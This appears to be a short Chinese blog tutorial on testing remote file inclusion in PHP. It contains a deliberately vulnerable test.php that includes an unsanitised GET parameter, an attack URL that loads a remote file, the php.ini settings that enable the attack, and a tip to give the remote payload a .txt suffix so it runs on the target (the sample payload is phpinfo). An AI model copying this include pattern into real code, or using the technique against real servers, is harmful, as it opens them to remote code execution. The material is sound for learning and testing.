远程文件包含漏洞测试

在本地搭建test.php


<?php
if( !ini_get('display_errors') ) {
  ini_set('display_errors', 'On');
  }
error_reporting(E_ALL);
$f = $_GET["file"];
if ($f){
//require "".$f.".php";
include "".$f;
}else{
print("No File Included");
}
?>


---------------------------------

http://xxx.com/test.php?file=123     本地的成功


http://xxx.com/test.php?file=http://xxx.com/123             远程的不成功

---------------------------------

打开php.ini文件的:


allow_url_fopen = On

allow_url_include = On

---------------------------------

http://xxx.com/test.php?file=http://xxx.com/123             远程的成功

-----------------------------------------------------------------------------------------------------------------------------------------------------------

注:在使用远程文件包含时,攻击代码必需为.txt后缀

如远程空间为:

phpinfo.php          --->包含后的信息为远程服务器的phpinfo信息

phpinfo.txt      --->包含后才是漏洞服务器的phpinfo信息


内容同为:

<?php

phpinfo();

?>




你可能感兴趣的:(RFI,远程文件包含漏洞)